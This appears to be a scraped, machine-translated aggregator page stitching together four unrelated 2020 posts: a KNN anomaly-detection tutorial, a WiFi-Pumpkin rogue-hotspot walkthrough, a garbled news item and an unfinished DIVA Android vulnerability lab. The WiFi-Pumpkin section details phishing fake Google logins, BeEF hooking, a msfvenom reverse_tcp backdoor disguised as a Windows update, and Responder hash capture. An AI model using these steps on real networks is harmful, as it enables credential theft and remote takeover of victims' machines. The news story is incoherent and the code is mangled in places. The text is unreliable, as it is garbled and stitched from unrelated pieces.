• # Posted by millikan at 2020-04-17

## knn algorithm detects abnormal operation behavior (welfare ~)

0x00 KNN (k-nearest neighbor) algorithm

K-nearest neighbor algorithm is a classification algorithm which uses the distance between different eigenvalues to classify.

• Advantages: high precision, insensitive to abnormal values

Advantages: high precision, insensitive to abnormal values

• Disadvantages: high computational complexity, high spatial complexity, very sensitive to the local structure of data

Disadvantages: high computational complexity, high spatial complexity, very sensitive to the local structure of data

• Required data sources: numerical and nominal

Required data sources: numerical and nominal

• Usually K is an integer no more than 20

Usually K is an integer no more than 20

## 0x01 an example of KNN algorithm that is easy to understand

What kind of green circle (Blue Square) should be classified in the figure? Red triangle?) take the K samples closest to the green circle, which kind of samples accounts for the most proportion, and which kind will be divided. When k = 3, the proportion of red triangle is 2 / 3, and the green circle will be classified into red triangle. When k = 5, the proportion of blue square is 3 / 5, and the green circle will be classified into blue square.

Do the following for each point in the dataset for an unknown category property in turn:

• Calculate the distance between the points in the known category dataset and the currently unknown category points

Calculate the distance between the points in the known category dataset and the currently unknown category points

• Sort by increasing distance

Sort by increasing distance

• Select k points with the minimum distance from the current point

Select k points with the minimum distance from the current point

• Determine the occurrence frequency of the category of the first k points

Determine the occurrence frequency of the category of the first k points

• Return the category with the highest frequency of the first k points as the prediction classification of the current point

Return the category with the highest frequency of the first k points as the prediction classification of the current point

## 0x02 practical example of KNN algorithm

There are two types of movies, love movies and action movies. We classify the films by the number of times the fighting and kissing scenes appear in the films. And we have some data sets classified.

## 0x03 characterize data

Data characterization is used to calculate the distance between the points in the dataset and the currently unknown category points.

Take the number of fighting shots and kissing shots as coordinates.

When classifying a machine with unknown data: the coordinate of the green point in the coordinate system is (10,5)

Calculate the distance between the green point and each red point and each blue point:

The distance between points can be calculated according to Pythagorean theorem.

After calculation, we can get:

d1, d2, d3, d4, d5, d6.....

And so on, when there are n constants:

All the D obtained are sorted in ascending order. The first k points are selected. The category with high frequency of the first k points is the category of unknown quantity.

Numerical normalization

However, when the range of one kind of data in the data set is larger than that of other data, that is, the greater the difference between some numbers in the equation, the greater the impact on the calculation results.

For example:

In this case, if the difference between (3000-1000) and (5-2) is larger, the weight of (3000-1000) in the calculation result will be larger.

In most cases, we should give the same weight to each feature, so when there are multiple values, multiple values should be given the same weight. When processing the eigenvalues of different value ranges, the usual method is to normalize the values, for example, the value range is 0 ~ 1 or - 1 ~ 1.

newValue=(oldValue−min)/(max−min)

For example, in the above movie classification: when the number of fighting shots is 5, normalize 5 to get a new result:

0.2308=(5−2)/(15−2)

## 0x04 detect abnormal behavior operation

A 1.5W line of cmd.txt file, like:

• Every command executed by 1 behavior, a collection of every 100 behaviors.

Every command executed by 1 behavior, a collection of every 100 behaviors.

A sign.txt file (150 lines in total) that marks whether each set (every 100 lines) is abnormal. 0 is normal, 1 is abnormal.

• If there is at least one exception command in a set (every 100 lines), the whole set is marked as 1

If there is at least one exception command in a set (every 100 lines), the whole set is marked as 1

### Step 1: data feature extraction

Since the tag file in the original data is a collection of 100 data, it is necessary to organize and extract the data of a.txt file. Collate all commands to obtain CMD list and frequency:

`cmd_list = [['cpp','sh',...,'col'],['sh',...,'windows'],...['mailbox','ksh',...'ls']]len(cmd_list) = 150`

Use freqdist (statistical text word frequency) to sort all commands according to the frequency as follows:

`frequency_list = FreqDist(list(cmd_list)).keys()frequency_list = ['vacation', 'sh', 'sendmail', 'cpp', 'xrdb', 'mkpts', 'test',....]`

frequency_list = ['vacation', 'sh', 'sendmail', 'cpp', 'xrdb', 'mkpts', 'test',....]

Organize the marking results of the sample, because the first 5K of the sample behaves normally, so the marking results are all

`y = list()a = open('sign.txt')for line in a.readlines():    line=line.strip('\n')    y.append(line)`

### Step 2: characterize the data

Use the word set to quantify the operation commands. The command data is converted to a specific value, and the frequency of the command occurrence is used as a reference to convert the command to a specific data feature.

`user_cmd_feature = list()for every_cmd_list in cmd_list:    v = [0]*len(frequency_list)    # 将按频率排序的所有的命令初始为0    for i in range(0, len(frequency_list)):            if list(frequency_list)[i] in every_cmd_list:            # 判断按频率排序的所有的命令是否在每组命令中出现过            v[i] += 1    user_cmd_feature.append(v)`

The result format of V is shown in the figure. The value of V can be understood as the coordinate point of coordinate system.

### Step 3: test the algorithm and use

Use Python library to pass in data for calculation.

```#训练样本数N = 90x_train = user_cmd_feature[:N]y_train = y[:N]# 训练数据集 x_test = user_cmd_feature[N:]y_test = y[N:]# 测试数据集 neigh = KNeighborsClassifier(n_neighbors=3)# 此处设置k=3neigh.fit(x_train, y_train) y_predict = neigh.predict(x_test)# 传入测试数据print(y_predict)# 测试数据计算结果 score=np.mean(y_test==y_predict)*100print(score)# 正确率```

X? Train = user? CMD? Feature [: n] y? Train = y [: n]? Train data set

X? Test = user? CMD? Feature [n:] y? Test = y [n:]? Test data set

Neigh = kneighborsclassifier (n ﹐ neighs = 3) ﹐ set K = 3neigh.fit (x ﹐ train, y ﹐ train) here

Y × predict = neigh.predict (x × test) × incoming test data print (Y × predict) × test data calculation result

Score = NP. Mean (y'test = = y'predict) * 100 print (score) ා accuracy

## 0x05 summary

The key point of this case is to characterize the data, that is, to convert specific commands into specific values. In the case of detecting abnormal behavior operation, because it is the command executed by the dataset for a user's history, we use the frequency of command occurrence as the feature of data characterization to quantify the operation command. Of course, in practical application, not only frequency is the feature, but also similarity can be added to process.

## 0x06 reference

• Getting started with machine learning of web security [https://item.jd.com/12158965.html]

Getting started with machine learning of web security [https://item.jd.com/12158965.html]

• Deep learning [https://item.jd.com/12128543.html]

Deep learning [https://item.jd.com/12128543.html]

Donation benefits

Follow the official microblog of mlsrc, and you will get a chance to receive a classic bestseller in the field of deep learning

---Deep learning

• # Posted by trammel at 2020-04-17

## describe

WiFi pumpkin is a complete framework dedicated to wireless environment penetration testing, which can forge access points to complete man in the middle attack, and also support some other wireless penetration testing functions. Aiming to provide a more secure wireless network service, the tool can be used to monitor the traffic data of the target user, and capture the unknown user through wireless phishing, so as to achieve the purpose of monitoring the data traffic of the target user.

## major function

• Rouge WiFi Access Point

Rouge WiFi Access Point

• Deauth Attack Clients AP

Deauth Attack Clients AP

• Probe Request Monitor

Probe Request Monitor

• DHCP Starvation Attack

DHCP Starvation Attack

• Credentials Monitor

Credentials Monitor

• Transparent Proxy

Transparent Proxy

• Windows Update Attack

Windows Update Attack

• Phishing Manager

Phishing Manager

• Partial Bypass HSTS protocol

Partial Bypass HSTS protocol

• Support beef hook

Support beef hook

• ARP Poison

ARP Poison

• DNS Spoof

DNS Spoof

• Patch Binaries via MITM

Patch Binaries via MITM

• Karma Attack (supporthostapd-mana)

Karma Attack (supporthostapd-mana)

• LLMNR,NBT-NS and MDNSpoisoner(Responder)

LLMNR,NBT-NS and MDNSpoisoner(Responder)

• Pumpkin-Proxy(ProxyServer(mitmproxyAPI))

Pumpkin-Proxy(ProxyServer(mitmproxyAPI))

• Capture images on the fly

Capture images on the fly

• TCP-Proxy(with scapy)

TCP-Proxy(with scapy)

## Plug-in unit

### Transparent Proxy:

Transparentproxy can allow users to intercept / modify traffic information, at the same time, it can achieve JavaScript injection of the target page, and it can also easily achieve modular injection and create a python file (plugins / extension / directory), and finally display information under the pumpproxy (label).

### TCP-Proxy Server

You can set up a proxy in TCP stream. It can filter the request and response flow through the scapy module and modify the packets of the TCP protocol to obtain the interception. This plug-in uses modules to view or modify the intercepted data. Only add your custom module in "plugins / analysts /", and it will be listed in the TCP proxy tag automatically.

## Install WiFi pumpkin

• git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

• pip install –r requirements.txt

pip install –r requirements.txt

• ./installer.sh –install

./installer.sh –install

• Run wifi-pumpkin: Python wifi-pumpkin.py

Run wifi-pumpkin: Python wifi-pumpkin.py

## Create fishing page

### Set MYSQL

• /etc/init.d/mysql start

/etc/init.d/mysql start

• Mysql –u root

Mysql –u root

• Create database xeus;

Create database xeus;

• Use xeus;

Use xeus;

• Put the fake login page file in the / var / www directory.

Put the fake login page file in the / var / www directory.

• Edit the database.php file and set the file content:

Edit the database.php file and set the file content:

```\$username = “root”; \$password = “”; \$db_name = “xeus”; \$tbl_name = “logins”;```

\$db_name = “xeus”;

The content set here is set according to your own environment. Here is my environment.

Restart MySQL / etc / init.d/mysql restart

### Set up WiFi pumpkin

Run wifi-pumpkin, enter this directory, Python wifi-pumpkin.py

To switch to the settings command, you can set the SSID number. Here, I directly select the default pumpap with the channel number of 11. Here, I select enable wireless security with the password of 1234567890, etc. Note: here the NetworkAdapter is the name of the wireless network card. You need to buy a wireless network card.

` 然后往下拉，可以看到默认设置dhcp服务设置的信息，这里保持默认就行。`

Cancel the proxy, click plugins next to it, and then cancel the proxy server, as shown in the figure.

Click start, and then you can see the wireless hotspot with the SSID of pumpap on the mobile phone. You can see the encryption status. Enter the set password; 1234567890, you can connect.

Then click DNS spoofer under modules to enter the page. Take dnsspoof default domain name example.com as an example, click Start attack. Make DNS spoofrunning

Select the phishing manager module, select index.html in options, and click Start server. Then, after the mobile client connects to the pumpap wireless hotspot, enter the domain name of example.com, and the setting information appears.

Then select setdirectory, as shown in the figure, set the fake login page path set above to setenv path, and then click Start server. You can see the relevant forged pages in the mobile client.

Enter the mailbox and password on the fake Google page above, and then enter the logins table of Mysql to see the relevant information.

### Beef with attack

Run. / bef in the / usr / share / bef XSS directory. As shown in the figure. Select the hook URL.

Follow the above process to set the pumpap wireless hotspot, enter the physics manager module, and select set as shown in the figure.

Then click Start server to run, then connect to the pumpap wireless hotspot on the mobile client, and then open the domain name of example.com. The attacked machine will appear on the beef page. Then you can go into deep attack through beef.

### Rebound shell

Generate a shellcode backdoor, use the msfvenom command: mefvenom – pwindows / meterpreter / reverse_tcp lhost = your local IP address lport = 4444 – f exe – o windowsupdate.exe to enter the msfconsole interface, and wait for the shell to connect.

According to the settings of WiFi push, enter the DNS spoofer interface, delete the example.com in DNS: spoof, and then fill in a domain name by yourself (I still choose example.com here). Here, please note that the previous example.com must be deleted. If it doesn't occupy a port, the subsequent operation will not succeed.

On the DNS spoofer page, select fake update to enter this page, and then add your own shellcode back door to this path. Here, you can choose windows update or Java update. The network adapter should choose WLAN 0, its own wireless network card.

Then connect to my fake pumpap wireless hotspot on the target machine and enter the domain name of example.com. You can enter the forgery page selected above.

The Java update page is shown below.

If the attacker's computer downloads our back door, it installs the back door. Then we can get its computer permission in Kali.

Run WiFi pumpkin program, and select responder in advanced mode: monitor mitm attack on the interface. As shown in the figure.

Then select responder in plugins and close enable proxy server. You can open the configuration page in change. (generally, it is better by default. You can also turn it on and off according to the options you want to grab), as shown in the figure.

Our main purpose is to grab the account and password of windows, run this operation on the target machine, and the user name and hash password of the target machine will be displayed in the WiFi Pushkin responder.

Conclusion:

The above is mainly verified by reference to some articles. The reference articles are as follows:

http://www.freebuf.com/articles/network/137159.html

https://github.com/P0cL4bs/WiFi-Pumpkin

• # Posted by tetley at 2020-04-17

## You are here

Created: Oct 22, 2019, 15:36 IST . Updated: Oct 22, 2019, 15:46 IST

Coach: Kerl's congresswoman Sandad's wife is holding a post on a soap media feed from the Hibbi Earn. It was written on Facebook that it was like a rip, if you can't stop him, then enjoy him.

It was written by the wife of Congress Sandad that she had enough on the Facebook post and people thought about it. Seeing food Linda has removed her post and also apologized.

On Tuesday morning, Linda Eden posted videos on Facebook. He took a video with his husband and his wife. Congressman took the pictures of the Hebrews. They wrote in the caption: "What kind of grape, if they cannot stop it, let them taste it."

Kerl lives in this village with more than 400 children

Kerl died in three days, in a number of kingdoms, in three days.

Let me tell you that the capital of Ker's office is filled with water these days and people added it to the social media from their mail. He has seen, and people have made a mockery of them.

Let me tell you that the children of Aracolm of the Hebrews are from the set and the election won the first time. Before that, he was from the Congress party. The rules are still in place.

• # Posted by tetley at 2020-04-17

## android app vulnerability learning (1)

Diva (damn secure and vulnerable APP) is a purposely designed android app with many vulnerabilities. Its purpose is to let developers, security engineers, QA, etc. understand some common security problems of android app. Similar to DVWA, it can also be regarded as a vulnerability drilling system. Download address:

`http:`

### testing environment

1. Install JDK, many tools need to use Java environment;

`https://developer.android.com/studio/index.html` `https://bitbucket.org/iBotPeaches/apktool/downloads`

`https://labs.mwrinfosecurity.com/tools/drozer/`

`https://sourceforge.net/projects/dex2jar/?source=typ_redirect`

`http:`

`http:`

### Part 1 unsafe log output

This problem is mainly because sensitive information is output to the logcat of the app in the app code. To view the logcat of the app record, you can use the following command:

2. Input user credentials and observe log output.

3. Source code: log. E ()

It can be seen that the user's input is output to the log. Look at the specific vulnerability code. Open the logactivity.class file with the jd-gui. The relevant code is shown in the figure:

### Part 2 hardcoded 1 (class source file)

Many development partners can use variable variables when developing apps. However, due to the lack of relevant security development awareness and the use of hard coding, there are certain security risks. The specific definition of hard coding can refer to Baidu. Developers should try to avoid hard coding in the development process. First look at the code hardcodeactivity.class involved in question 2. The JD GUI is opened. The relevant codes are as follows:

View hardcodeactivity.class:

The attacker only needs to enter the secret key vendorsecretkey in the app to access successfully, as shown in the figure:

### Part 3 insecure storage 1 (shared_prefs / xxx. XML)

Insecure data storage is also one of the common security problems of app, mainly in three ways:

1. Save sensitive data to configuration file;

2. Store sensitive data in the local SQLite3 database;

3. Save sensitive data in temporary file or SD card.

The data stored by the SharedPreferences class will be stored in. XML

`/data/data/apppackagename/shared_prefs`

Under the directory. As shown in the picture:

`cd /data/data/jakhar.aseen.diva/shared_prefs`

### Part 4 insecure storage 2 (databases / xxx. DB)

Sensitive information of the user is stored in the local database. Generally, the database directory corresponding to the app:

`/data/data/apppackagename/databases` `/data/data/jakhar.aseem.diva/databases`

As shown in the picture:

`cd /data/data/jakhar.aseen.diva/databases` `cd /data/data/jakhar.aseen.diva/`

### Part 6 insecure storage 4 (SD card)

Stored in SD card, vulnerability code fragment: